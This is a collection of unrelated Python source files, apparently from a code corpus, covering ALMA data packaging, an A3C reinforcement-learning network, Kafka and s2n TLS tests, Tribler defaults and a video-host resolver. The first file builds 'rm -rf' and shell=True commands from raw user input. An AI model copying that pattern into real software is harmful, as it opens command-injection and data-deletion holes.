subprocess.call(['/home/casa/contrib/AIV/science/DSO/tarsplit.py -f -o %s_%s %s' % (datadict['code'], datadict['mous'], datadict['code'])], shell=True)
tarball_name = glob.glob('%s_%s*.tar' % (datadict['code'], datadict['mous']))
os.system('rm -rf %s' % datadict['code'])
os.system('rm %s.ticket.tar' % datadict['code'])
os.system('rm %s.ticket.zip' % datadict['code'])
#Removing some of the extra output
os.system('rm -f PackagingInstructions')
os.system('rm -f casa-*.log')
os.system('rm -f ipython-*.log')
return tarball_name
# --------------------------------------------------------------------------------------------------
def ProprietaryAccess(datadict, username, PI, qa2_dir):
# --------------------------------------------------------------------------------------------------
'''
This takes care of putting the SRDP (calibrated_final.ms) in the proprietary area for the PI to pickup
'''
import os
import glob
import sys
#substituting in the PI code
pi_code = PI
#creating a directory for this PI in the area they can download it (if it doesn't already exist)
os.chdir('/lustre/naasc/ALMA_Data_Delivery/proprietary/')
if os.path.isdir('%s' % pi_code) == False:
os.mkdir('%s' % pi_code)
#checking and creating/appending an .htaccess file
os.chdir('%s' % pi_code)
if os.path.isfile('.htaccess') == False:
htaccess = open('.htaccess', 'a')
htaccess.write('AuthType CAS\n')
htaccess.write('Require user %s %s dckim cbrogan aremijan ksharp cubach swood pmurphy teuben\n' % (pi_code, username))
htaccess.write('Order deny,allow\n')
htaccess.write('AuthName \"Authentication Required\"\n')
htaccess.close()
if os.path.isfile('.htaccess') == True:
#if the file exists, see if the current user is already listed for access
htaccess = open('.htaccess').readlines()
for line in htaccess:
if username in line:
continue #this means the user is already listed and nothing needs to be done
else: #their name needs to be added; so lets write a new file and add the name
if 'user' in line:
current_users = line
new_users = current_users.strip()+' %s' % username
new_htaccess = open('.htaccess_new', 'a')
new_htaccess.write('AuthType CAS\n')
new_htaccess.write(new_users+'\n')
new_htaccess.write('Order deny,allow\n')
new_htaccess.write('AuthName \"Authentication Required\"\n')
new_htaccess.close()
#putting the new file in place of the old one
os.system('mv -f .htaccess .htaccess_old')
os.system('mv -f .htaccess_new .htaccess')
#creating a directory in the PI area for this specific MOUS; in the case it does already exist (not sure why) then continue on
os.chdir('/lustre/naasc/ALMA_Data_Delivery/proprietary/%s' % pi_code)
if os.path.isdir('%s' % datadict['mous'].split('_')[-1]) == False:
os.mkdir('%s' % datadict['mous'].split('_')[-1])
os.chdir('%s' % datadict['mous'].split('_')[-1])
mous_dir = datadict['mous'].split('_')[-1]
delivery_path = os.getcwd()
#moving the calibrated_final.ms.tar into this directory
os.chdir('%s/%s_%s/Imaging' % (qa2_dir, datadict['code'], datadict['mous']))
os.system('tar -cvf calibrated_final.ms.tar calibrated_final.ms') #the calibrated_final.ms should already exist, now we need to tar it and move it
os.system('mv calibrated_final.ms.tar %s' % delivery_path)
#checking the directory and file are there:
if os.path.exists('/lustre/naasc/web/almadata/proprietary/%s/%s/calibrated_final.ms.tar' % (pi_code, mous_dir)) == False:
raw_input('Error: package not in delivery area')
else:
SRDP_path = '/lustre/naasc/web/almadata/proprietary/%s/%s/calibrated_final.ms.tar' % (pi_code, mous_dir)
return mous_dir, pi_code, SRDP_path
# --------------------------------------------------------------------------------------------------
#main
# --------------------------------------------------------------------------------------------------
import os
import webbrowser
# ---------------------------
#prerequisites
username = raw_input('What is your lustre username?:').strip()
mous = raw_input('What is the MOUS code? (from SCOPS-ticket):').strip()
PI = raw_input('What is the PI user ID? (from ALMA_Data_Delivery):').strip()
mousid=mous.replace(':','_').replace('/','_')
mous_dir = mousid.split('_')[-1]
datadict = ReadDataFromWeb(mou |
AlphaSmartDog/DeepLearningNotes | Note-6 A3CNet/Note-6.2 A3C与HS300指数择时/agent/framework.py | Python | mit | 6,700 | 0.001343 | import numpy as np
import tensorflow as tf
from agent.forward import Forward
from config import *
_EPSILON = 1e-6 # avoid nan
# local network for advantage actor-critic which are also know as A2C
class Framework(object):
def __init__(self, access, state_size, action_size, scope_name):
self.Access = access
self.action_size = action_size
self.action_space = list(range(action_size))
with tf.variable_scope(scope_name):
# placeholder
self.inputs = tf.placeholder(tf.float32, [None] + state_size, "states")
self.actions = tf.placeholder(tf.int32, [None], "actions")
self.targets = tf.placeholder(tf.float32, [None], "discounted_rewards")
# network interface
self.actor = Forward('actor')
self.critic = Forward('critic')
self.policy = tf.nn.softmax(self.actor(self.inputs, self.action_size))
self.value = self.critic(self.inputs, 1)
self.policy_step = tf.squeeze(self.policy, axis=0)
self.greedy_action = tf.argmax(self.policy_step)
# losses
self._build_losses()
# async framework
self._build_async_interface()
self._build_interface()
print('graph %s' % (str(scope_name)))
def _build_losses(self):
# value loss
targets = tf.expand_dims(self.targets, axis=1)
self.advantage = targets - self.value
self.value_loss = tf.reduce_mean(tf.square(self.advantage))
# policy loss
action_gather = tf.one_hot(self.actions, self.action_size)
policy_action = tf.reduce_sum(self.policy * action_gather,
axis=1, keep_dims=True)
log_policy_action = tf.log(policy_action + _EPSILON)
self.policy_loss = -tf.reduce_mean(
tf.stop_gradient(self.advantage) * log_policy_action)
# entropy loss
entropy_loss = tf.reduce_sum(
self.policy * tf.log(self.policy + _EPSILON),
axis=1, keep_dims=True)
self.entropy_loss = tf.reduce_mean(entropy_loss)
# regularization
self.actor_norm = tf.add_n(self.actor.get_regularization()) * ACTOR_NORM_BETA
self.critic_norm = tf.add_n(self.critic.get_regularization()) * CRITIC_NORM_BETA
# total loss
self.actor_loss = self.policy_loss + ENTROPY_BETA * self.entropy_loss + self.actor_norm
self.critic_loss = self.value_loss + self.critic_norm
# interface adjustment parameters
self.a_actor_loss = self.actor_loss
self.a_policy_mean = -tf.reduce_mean(log_policy_action)
self.a_policy_loss = self.policy_loss
self.a_entropy_loss = ENTROPY_BETA * self.entropy_loss
self.a_actor_norm = self.actor_norm
self.a_critic_loss = self.critic_loss
self.a_value_loss = self.value_loss
self.a_critic_norm = self.critic_norm
self.a_value_mean = tf.reduce_mean(self.value)
self.a_advantage = tf.reduce_mean(self.advantage)
def _build_interface(self):
self.a_interface = [self.a_actor_loss,
self.a_actor_grad,
self.a_policy_mean,
self.a_policy_loss,
self.a_entropy_loss,
self.a_actor_norm,
self.a_critic_loss,
self.a_critic_grad,
self.a_value_loss,
self.a_critic_norm,
self.a_value_mean,
self.a_advantage]
def _build_async_interface(self):
global_actor_params, global_critic_params = self.Access.get_trainable()
local_actor_params, local_critic_params = self.get_trainable()
actor_grads = tf.gradients(self.actor_loss, list(local_actor_params))
critic_grads = tf.gradients(self.critic_loss, list(local_critic_params))
# Set up optimizer with global norm clipping.
a | ctor_grads, self.a_actor_grad = tf.clip_by_global_norm(actor_grads, MAX_GRAD_NORM)
critic_grads, self.a_critic_grad = tf.clip_by_global_norm(critic_grads, MAX_GRAD_NORM)
# update | Access
actor_apply = self.Access.optimizer_actor.apply_gradients(
zip(list(actor_grads), list(global_actor_params)))
critic_apply = self.Access.optimizer_critic.apply_gradients(
zip(list(critic_grads), list(global_critic_params)))
self.update_global = [actor_apply, critic_apply]
# update ACNet
assign_list = []
for gv, lv in zip(global_actor_params, local_actor_params):
assign_list.append(tf.assign(lv, gv))
for gv, lv in zip(global_critic_params, local_critic_params):
assign_list.append(tf.assign(lv, gv))
self.update_local = assign_list
def get_trainable(self):
return [self.actor.get_variables(), self.critic.get_variables()]
def get_policy(self, sess, inputs):
return sess.run(self.policy, {self.inputs: inputs})
def get_stochastic_action(self, sess, inputs, epsilon=0.95):
# get stochastic action for train
if np.random.uniform() < epsilon:
policy = sess.run(self.policy_step,
{self.inputs: np.expand_dims(inputs, axis=0)})
return np.random.choice(self.action_space, 1, p=policy)[0]
else:
return np.random.randint(self.action_size)
def get_deterministic_policy_action(self, sess, inputs):
# get deterministic action for test
return sess.run(self.greedy_action,
{self.inputs: np.expand_dims(inputs, axis=0)})
def get_value(self, sess, inputs):
return sess.run(self.value, {self.inputs: inputs})
def train_step(self, sess, inputs, actions, targets):
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets}
sess.run(self.update_global, feed_dict)
def init_network(self, sess):
"""
init or update local network
:param sess:
:return:
"""
sess.run(self.update_local)
def get_losses(self, sess, inputs, actions, targets):
"""
get all loss functions of network
:param sess:
:param inputs:
:param actions:
:param targets:
:return:
"""
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets}
return sess.run(self.a_interface, feed_dict)
|
zuun77/givemegoogletshirts | codejam/2020/qual/test.py | Python | apache-2.0 | 167 | 0.011976 | f | rom __future__ import print_function
import sys
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwa | rgs)
print("Python version")
eprint(sys.version)
|
ktan2020/legacy-automation | win/Lib/site-packages/pip-1.3.1-py2.7.egg/pip/status_codes.py | Python | mit | 87 | 0 | SUCCESS | = 0
ERROR = 1
UNKNOWN_ERROR = 2
VIRTUALENV_NOT_FOUND = 3
NO_MATCHES_FOUND = 2 | 3
|
alexeblee/s2n | tests/integration/common/s2n_test_scenario.py | Python | apache-2.0 | 5,789 | 0.002937 | ##
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
#
"""
Most s2n integration tests are run against a variety of arguments.
A "scenario" represents a specific set of inputs, such as address,
cipher, version, etc.
"""
import itertools
import multiprocessing
import os
from enum import Enum as BaseEnum
from multiprocessing.pool import ThreadPool
class Enum(BaseEnum):
def __str__(self):
return self.name
@classmethod
def all(cls):
return cls
class Version(Enum):
SSLv3 = 30
TLS10 = 31
TLS11 = 32
TLS12 = 33
TLS13 = 34
class Mode(Enum):
client = 0
server = 1
def is_client(self):
return self is Mode.client
def is_server(self):
return self is Mode.server
def other(self):
return Mode.server if self.is_client() else Mode.client
class Cipher():
def __init__(self, name, min_version):
self.name = name
self.min_version = min_version
def valid_for(self, version):
if not version:
version = Version.default()
if version.value < self.min_version.value:
return False
if self.min_version is Version.TLS13:
return version.value >= Version.TLS13.value
return True
def __str__(self):
return self.name
@classmethod
def all(cls):
return ALL_CIPHERS_PER_LIBCRYPTO_VERSION[get_libcrypto()]
def get_libcrypto():
return str(os.getenv("S2N_LIBCRYPTO")).strip('"')
ALL_CIPHERS = [
Cipher("TLS_AES_256_GCM_SHA384", Version.TLS13),
Cipher("TLS_CHACHA20_POLY1305_SH | A256", Version.TLS13),
Cipher("TLS_AES_128_GCM_SHA256", Version.TLS13)
]
# Older Openssl and libressl do not support CHACHA20
LEGACY_COMPATIBLE_CIPHERS = list(filter(lambda x: "CHACHA20" not in x.name, ALL_CIPHERS))
ALL_CIPHERS_PER_LIBCRYPTO_VERSION = {
"openssl-1.1.1" : ALL_CIPHERS,
"openssl-1.0.2" : LEGACY_COMPATIBLE_CIPHERS,
"openssl-1.0.2-fips" : LEGACY_COMPATIB | LE_CIPHERS,
"libressl" : LEGACY_COMPATIBLE_CIPHERS,
}
ALL_CURVES = ["P-256", "P-384"]
class Scenario:
"""
Describes the configuration for a specific TLS connection.
"""
def __init__(self, s2n_mode, host, port, version=None, cipher=None, curve=None, s2n_flags=[], peer_flags=[]):
"""
Args:
s2n_mode: whether s2n should act as a client or server.
host: host to connect or listen to.
port: port to connect or listen to.
version: which TLS protocol version to use. If None, the implementation will
use its default.
cipher: which cipher to use. If None, the implementation will use its default.
s2n_flags: any extra flags that should be passed to s2n.
peer_flags: any extra flags that should be passed to the TLS implementation
that s2n connects to.
"""
self.s2n_mode = s2n_mode
self.host = host
self.port = port
self.version = version
self.cipher = cipher
self.curve = curve
self.s2n_flags = s2n_flags
self.peer_flags = peer_flags
def __str__(self):
version = self.version if self.version else "DEFAULT"
cipher = self.cipher if self.cipher else "ANY"
result = "Mode:%s %s Version:%s Curve:%s Cipher:%s" % \
(self.s2n_mode, " ".join(self.s2n_flags), str(version).ljust(7), self.curve, str(cipher).ljust(30))
return result.ljust(100)
def __create_thread_pool():
threadpool_size = multiprocessing.cpu_count() * 2 # Multiply by 2 since performance improves slightly if CPU has hyperthreading
threadpool = ThreadPool(processes=threadpool_size)
return threadpool
def run_scenarios(test_func, scenarios):
failed = 0
threadpool = __create_thread_pool()
results = {}
print("\tRunning scenarios: " + str(len(scenarios)))
for scenario in scenarios:
async_result = threadpool.apply_async(test_func, (scenario,))
results.update({scenario: async_result})
threadpool.close()
threadpool.join()
results.update((k, v.get()) for k,v in results.items())
# Sort the results so that failures appear at the end
sorted_results = sorted(results.items(), key=lambda x: not x[1].is_success())
for scenario, result in sorted_results:
print("%s %s" % (str(scenario), str(result).rstrip()))
if not result.is_success():
failed += 1
return failed
def get_scenarios(host, start_port, s2n_modes=Mode.all(), versions=[None], ciphers=[None], curves=ALL_CURVES, s2n_flags=[], peer_flags=[]):
port = start_port
scenarios = []
combos = itertools.product(versions, s2n_modes, ciphers, curves)
for (version, s2n_mode, cipher, curve) in combos:
if cipher and not cipher.valid_for(version):
continue
for s2n_mode in s2n_modes:
scenarios.append(Scenario(
s2n_mode=s2n_mode,
host=host,
port=port,
version=version,
cipher=cipher,
curve=curve,
s2n_flags=s2n_flags,
peer_flags=peer_flags))
port += 1
return scenarios
|
sslavic/kafka | tests/kafkatest/tests/client/client_compatibility_produce_consume_test.py | Python | apache-2.0 | 4,454 | 0.004041 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.mark import parametrize
from ducktape.utils.util import wait_until
from kafkatest.services.zookeeper import ZookeeperService
from kafkatest.services.kafka import KafkaService
from kafkatest.services.verifiable_producer import VerifiableProducer
from kafkatest.services.console_consumer import ConsoleConsumer
from kafkatest.tests.produce_consume_validate import ProduceConsumeValidateTest
from kafkatest.utils import is_int_with_prefix
from kafkatest.version import DEV_BRANCH, LATEST_0_10_0, LATEST_0_10_1, LATEST_0_10_2, LATEST_0_11_0, LATEST_1_0, LATEST_1_1, LATEST_2_0, LATEST_2_1, LATEST_2_2, LATEST_2_3, LATEST_2_4, KafkaVersion
class ClientCompatibilityProduceConsumeTest(ProduceConsumeValidateTest):
"""
These tests validate that we can use a new client to produce and consume from older brokers.
"""
def __init__(self, test_context):
""":type test_context: ducktape.tests.test.TestContext"""
super(ClientCompatibilityProduceConsumeTest, self).__init__(test_context=test_context)
self.topic = "test_topic"
self.zk = ZookeeperService(test_context, num_nodes=3)
self.kafka = KafkaService(test_context, num_nodes=3, zk=self.zk, topics={self.topic:{
| "partitions": 10,
| "replication-factor": 2}})
self.num_partitions = 10
self.timeout_sec = 60
self.producer_throughput = 1000
self.num_producers = 2
self.messages_per_producer = 1000
self.num_consumers = 1
def setUp(self):
self.zk.start()
def min_cluster_size(self):
# Override this since we're adding services outside of the constructor
return super(ClientCompatibilityProduceConsumeTest, self).min_cluster_size() + self.num_producers + self.num_consumers
@parametrize(broker_version=str(DEV_BRANCH))
@parametrize(broker_version=str(LATEST_0_10_0))
@parametrize(broker_version=str(LATEST_0_10_1))
@parametrize(broker_version=str(LATEST_0_10_2))
@parametrize(broker_version=str(LATEST_0_11_0))
@parametrize(broker_version=str(LATEST_1_0))
@parametrize(broker_version=str(LATEST_1_1))
@parametrize(broker_version=str(LATEST_2_0))
@parametrize(broker_version=str(LATEST_2_1))
@parametrize(broker_version=str(LATEST_2_2))
@parametrize(broker_version=str(LATEST_2_3))
@parametrize(broker_version=str(LATEST_2_4))
def test_produce_consume(self, broker_version):
print("running producer_consumer_compat with broker_version = %s" % broker_version)
self.kafka.set_version(KafkaVersion(broker_version))
self.kafka.security_protocol = "PLAINTEXT"
self.kafka.interbroker_security_protocol = self.kafka.security_protocol
self.producer = VerifiableProducer(self.test_context, self.num_producers, self.kafka,
self.topic, throughput=self.producer_throughput,
message_validator=is_int_with_prefix)
self.consumer = ConsoleConsumer(self.test_context, self.num_consumers, self.kafka, self.topic,
consumer_timeout_ms=60000,
message_validator=is_int_with_prefix)
self.kafka.start()
self.run_produce_consume_validate(lambda: wait_until(
lambda: self.producer.each_produced_at_least(self.messages_per_producer) == True,
timeout_sec=120, backoff_sec=1,
err_msg="Producer did not produce all messages in reasonable amount of time"))
|
Captain-Coder/tribler | Tribler/Core/defaults.py | Python | lgpl-3.0 | 2,390 | 0.001255 | """
Default values for configurable parameters of the Core.
Author(s): Arno Bakker, Bram Cohen, Egbert Bouman
"""
# WARNING:
# As we have release Tribler 4.5.0 you must now take into account that
# people have stored versions of these params on their disk. Make sure
# you change the version number of the structure and provide upgrade code
# such that your code won't barf because we loaded an older version from
# disk that does not have your new fields.
#
import sys
from collections import OrderedDict
DEFAULTPORT = 7760
#
#
# BT per download opts
#
# History:
# Version 2: as released in Tribler 4.5.0
# Version 3:
# Version 4: allow users to specify a download directory every time
# Version 6: allow users to overwrite the multifile destination
# Version 7: swift params
# Version 8: deleted many of the old params that were not used anymore (due to the switch to libtorrent)
# Version 9: remove swift
# Version 10: add default anonymous level
# Version 11: remove createmerkletorrent, torrentsigkeypairfilename, makehash_md5, makehash_crc32, makehash_sha1
# Version 12: remove thumb
# Version 13: remove super_seeder
# Version 15: add seeding ratio
# Version 16: added field whether the download has been manually stopped by the user and time added
dldefaults = OrderedDict()
# General download settings
dldefaults['download_defaults'] = OrderedDict()
dldefaults['download_defaults']['mode'] = 0
dldefaults['download_defaults']['hops'] = 0
dldefaults['download_defaults']['selected_files'] = | []
dldefaults['download_defaults']['correctedfilename'] = None
dldefaults['download_defaults']['safe_seeding'] = False
# Valid values: 'forever', 'never', 'ratio', 'time'
d | ldefaults['download_defaults']['user_stopped'] = False
dldefaults['download_defaults']['time_added'] = 0
dldefaults['download_defaults']['credit_mining'] = False
tdefdictdefaults = {}
tdefdictdefaults['comment'] = None
tdefdictdefaults['created by'] = None
tdefdictdefaults['announce'] = None
tdefdictdefaults['announce-list'] = None
tdefdictdefaults['nodes'] = None # mainline DHT
tdefdictdefaults['httpseeds'] = None
tdefdictdefaults['url-list'] = None
tdefdictdefaults['encoding'] = None
tdefmetadefaults = {}
tdefmetadefaults['version'] = 1
tdefmetadefaults['piece length'] = 0
TDEF_DEFAULTS = {}
TDEF_DEFAULTS.update(tdefdictdefaults)
TDEF_DEFAULTS.update(tdefmetadefaults)
|
vrk-kpa/ckanext-xroad_integration | ckanext/xroad_integration/auth.py | Python | agpl-3.0 | 501 | 0.003992 | from ckan.plugins.toolkit import check_access, NotAuthorized, _
def xroad_error_list(context, | data_dict):
if not data_dict.get('organization'):
return check_access('sysadmin', context)
else:
try:
check_access('organization_update', context, {"id": data_dict.get('organization')})
return {"success": True}
except NotAuthorized:
return {"success": False, "msg": _(u"User not authorized to view X-Road error | list for organization")}
|
J-Sorenson/annnotations-line2d | annotations_line2d.py | Python | cc0-1.0 | 20,221 | 0.009798 | # -*- coding: utf-8 -*-
"""
annotations_line2d module
Created on Thu Sep 10 21:51:23 2015
@author: James Sorenson
"""
import matplotlib
import matplotlib.pyplot as plt
# This is to prevent overlapping annotations from being dragged simultaneously
# due to the multi-threaded nature of the matplotlib gui.
import threading
###########################
# Globals
###########################
attr_name = 'annotations_line2d'
_event= None # Used for debugging
###########################
# Class definitions
###########################
class DraggableAnnotationLine2D(matplotlib.offsetbox.DraggableBase):
"""This class is like Matplotlib’s DraggableAnnotation, but this one actually works.
Apparently, the original class can't handle annotations that are created
using 'offset points' from a data point. This class ONLY works with those.
Left-click to move the annotation without changing the data point.
Middle-click to slide the annotation to a different data point.
Right-click to delete the annotation.
The original annotation artist is in self.ref_artist.
We save additional info in self.line, self.index, and self.formatter.
"""
# Class-level lock to make sure only ONE annotation is moved at a time.
# Due to QT's multi—threaded nature, it‘s best to use a real thread lock.
_drag_lock=threading.Lock()
_counter=0 # Just a counter to give each annotation a unique ID.
def __init__(self, ref_artist, line=None, index=None, formatter=None, use_blit=True):
# Use the base init (This isn‘t C++ where the parent is called automatically.)
super().__init__(ref_artist, use_blit=use_blit)
# Store the other parameters
self.line=line
self.index=index
self.formatter=formatter
# Create a unique ID for this annotation (for debugging)
DraggableAnnotationLine2D._counter += 1
DraggableAnnotationLine2D._counter %= 2**31 # Not too big
self.id = DraggableAnnotationLine2D._counter
#print('Init',self.id)
if formatter is not None:
# Get and set the text
self.ref_artist.set_text(self.formatter(line, index))
#Update the canvas to make sure the annotation is visible
self.canvas.draw()
def artist_picker(self, artist, event):
"""
Determines if the artist should enable move for this mouse button event
"""
# Make sure this only happens with a click. Ignore scroll.
# Left or Right click works on all of these annotations
# Middle click (slide) requires that line and index are assigned
if (event.button in (1,3)) or \
(event.button ==2 and self.line is not None and self.index is not None):
# Good action. We only want to drag if the cursor is inside the
# box, not the arrow and the area around it.
# contains(event) returns (bool,attr)
#print('Picked',self.id)
drag = self.ref_artist.get_bbox_patch().contains(event)
if drag[0]:
#Make sure no other annotation are dragging.
# wait=False means no block. True if a successful lock.
if DraggableAnnotationLine2D._drag_lock.acquire(False):
# Record the mouse button
self.button=event.button
#print('Claim',self.id)
return drag
# If we made it here, then we're not moving
return (False, None)
def save_offset(self):
"""
On button-down, this saves the current location of the annotation.
Annotation object is in self.ref_artist.
"""
#print('Save',self.id)
if self.button == 1:
# Left-click. Move the annotation while pointing at the same data.
# Get the starting position of the artist in points (relative to data point)
self.drag_start_text_points = self.ref_artist.get_position()
# Get the inverted transform so we can convert pixels to paints.
self.drag_trans_mat = self.ref_artist.get_transform().inverted().get_matrix()
elif self.button == 2:
# Middle-click. We need some additional information to slide the data.
self.xydata=self.line.get_xydata() #just makes it easier (this does NOT copy)
# we need the pixels of the starting data point (not the cursor)
self.drag_start_pixels = self.ref_artist.get_axes().transData.transform(self.ref_artist.xy)
# Get the translation from pixels to data for annotation.xy
self.drag_trans_pix2dat = self.ref_artist.get_axes().transData.inverted()
def update_offset(self, dx, dy):
"""
dx and dy is the total pixel offset from the point where the mouse
drag started.
"""
if self.button == 1: # Left—click
# Scale delta pixels to delta points using parts of annotation transform.
# The full transform includes the data offset, but set position already does that.
new_position=(self.drag_start_text_points[0] + dx * self.drag_trans_mat[0,0],
self.drag_start_text_points[1] + dy * self.drag_trans_mat[1,1])
# Apply as delta points from data point
self.ref_artist.set_position(new_position)
elif self.button == 2: # Middle—click
| # We may have a logarithmic scale, but update offset only gives us delta pixels.
# Add the delta to the starting pixels, then convert to data coordinates
pixels_dxy = matplotlib.numpy.array((dx,dy))
new_data_xy = self.drag_trans_pix2dat.transform(self.drag_start_pixels+pixels_dxy)
# D | etermine if the new data coordinates reach or exceed the next line data point.
index=self.index
while (index > 0) and (self.xydata[index-1][0] > new_data_xy[0]):
#Move left
index -= 1
while (index < self.xydata.shape[0] - 1) and (self.xydata[index+1][0] < new_data_xy[0]):
# Move right
index += 1
if index != self.index:
# we moved an index! Update the annotation
self.ref_artist.xy=self.xydata[index,:]
self.index=index
if self.formatter is not None:
# Update the text in the annotation
self.ref_artist.set_text(self.formatter(self.line, index))
def finalize_offset(self):
"""Called when the mouse button is released, if this was picked in the first place."""
#print('Finalize',self.id)
if self.button == 2 and self.formatter is not None:
# Print out annotation text for the user to copy/paste
self.print_annotation()
elif self.button == 3:
# Delete annotation
self.remove()
def on_release(self,event):
"""
Called when the mouse button is released, whether or not this was picked.
We extend this function so that we are guaranteed to release the thread lock.
"""
# Call the original
super().on_release(event)
#Everyone tries to remove the block, just in case the controlling annotation was removed.
try:
DraggableAnnotationLine2D._drag_lock.release()
except RuntimeError:
pass # Already released. Not a concern.
def print_annotation(self):
"""Does exactly what you think it does"""
print('Annotation: {0}, ind={1}\n{2}'.format(self.line.get_label(), self.index, self.ref_artist.get_text()))
def remove(self):
"""Disconnect and delete the annotation."""
#print('Remove',self.id)
self.disconnect() # Disconnect the callbacks
self.ref_artist.remove() # Delete the annotation artist
self.got_artist=False # Tell this class it no longer has an artist
self.canvas.draw() # Update the whole canvas so the annotation disappears
class AnnotationPicker(object):
|
ghostrocket/django-debug-toolbar-gae | tests/urls.py | Python | bsd-3-clause | 404 | 0.007426 | """
URLpatterns for the debug toolbar.
These sh | ould not be loaded explicitly; the debug toolbar middleware will patch
this into the urlconf for the request.
"""
from django.conf.urls.defaults import *
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# This pattern should be last to ensure tests still work
url(r'^execute_sql/$', 'tests.views.execute_sql'), |
)
|
VioletRed/script.module.urlresolver | lib/urlresolver/plugins/videohut.py | Python | gpl-2.0 | 5,173 | 0.007539 | """
urlresolver XBMC Addon
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FO | R A PARTICULAR PURPOSE. See the
GNU General Public Li | cense for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
from t0mm0.common.net import Net
import urllib2, os
from urlresolver import common
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
import xbmcgui
from lib import unwise
import urllib
#SET ERROR_LOGO# THANKS TO VOINAGE, BSTRDMKR, ELDORADO
error_logo = os.path.join(common.addon_path, 'resources', 'images', 'redx.png')
class VideoHutResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "videohut.to"
domains = [ "videohut.to" ]
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
self.pattern = 'http://www.(videohut.to)/(?:v\/|embed.php\?id=)([0-9a-z]+)'
def get_url(self, host, media_id):
return 'http://www.videohut.to/embed.php?id=%s' % (media_id)
def get_host_and_id(self, url):
r = re.search(self.pattern, url)
if r: return r.groups()
else: return False
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return re.match(self.pattern, url) or self.name in host
def __get_stream_url(self, media_id, filekey, error_num=0, error_url=None):
'''
Get stream url.
If previously found stream url is a dead link, add error params and try again
'''
if error_num > 0 and error_url:
_error_params = '&numOfErrors={0}&errorCode=404&errorUrl={1}'.format(
error_num,
urllib.quote_plus(error_url).replace('.', '%2E')
)
else:
_error_params = ''
#use api to find stream address
api_call = 'http://www.videohut.to/api/player.api.php?{0}&file={1}&key={2}{3}'.format(
'user=undefined&pass=undefined',
media_id,
urllib.quote_plus(filekey).replace('.', '%2E'),
_error_params
)
api_html = self.net.http_GET(api_call).content
rapi = re.search('url=(.+?)&title=', api_html)
if rapi:
return urllib.unquote(rapi.group(1))
return None
def __is_stream_url_active(self, web_url):
try:
header = self.net.http_HEAD(web_url)
if header.get_headers():
return True
return False
except:
return False
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
dialog = xbmcgui.Dialog()
#grab stream details
try:
html = self.net.http_GET(web_url).content
html = unwise.unwise_process(html)
filekey = unwise.resolve_var(html, "flashvars.filekey")
error_url = None
stream_url = None
# try to resolve 3 times then give up
for x in range(0, 2):
link = self.__get_stream_url(media_id, filekey,
error_num=x,
error_url=error_url)
if link:
active = self.__is_stream_url_active(link)
if active:
stream_url = urllib.unquote(link)
break;
else:
# link inactive
error_url = link
else:
# no link found
raise Exception ('File Not Found or removed')
if stream_url:
return stream_url
else:
raise Exception ('File Not Found or removed')
except urllib2.URLError, e:
common.addon.log_error(self.name + ': got http error %d fetching %s' %
(e.code, web_url))
common.addon.show_small_popup('Error','Http error: '+str(e), 8000, error_logo)
return self.unresolvable(code=3, msg=e)
except Exception, e:
common.addon.log('**** videohut Error occured: %s' % e)
common.addon.show_small_popup(title='[B][COLOR white]videohut[/COLOR][/B]', msg='[COLOR red]%s[/COLOR]' % e, delay=5000, image=error_logo)
return self.unresolvable(code=0, msg=e)
|
vyscond/cocos | test/test_menu_centered.py | Python | bsd-3-clause | 1,329 | 0.034612 | from __future__ import division, print_function, unicode_literals
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, q"
tags = "menu, menu_valign, menu_halign"
from pyglet import image
from pyglet.gl import *
from pyglet import font
from cocos.director import *
from cocos.menu import *
from cocos.scene import *
from cocos.layer import | *
class MainMenu(Menu):
def __init__( self ):
super( MainMenu, self ).__init__("TITLE" )
self.menu_valig | n = CENTER
self.menu_halign = CENTER
# then add the items
items = [
( MenuItem('Item 1', self.on_quit ) ),
( MenuItem('Item 2', self.on_quit ) ),
( MenuItem('Item 3', self.on_quit ) ),
( MenuItem('Item 4', self.on_quit ) ),
( MenuItem('Item 5', self.on_quit ) ),
( MenuItem('Item 6', self.on_quit ) ),
( MenuItem('Item 7', self.on_quit ) ),
]
self.create_menu( items, shake(), shake_back() )
def on_quit( self ):
pyglet.app.exit()
def main():
pyglet.font.add_directory('.')
director.init( resizable=True)
director.run( Scene( MainMenu() ) )
if __name__ == '__main__':
main()
|
rsepassi/tensor2tensor | tensor2tensor/data_generators/gene_expression_test.py | Python | apache-2.0 | 2,513 | 0.002786 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
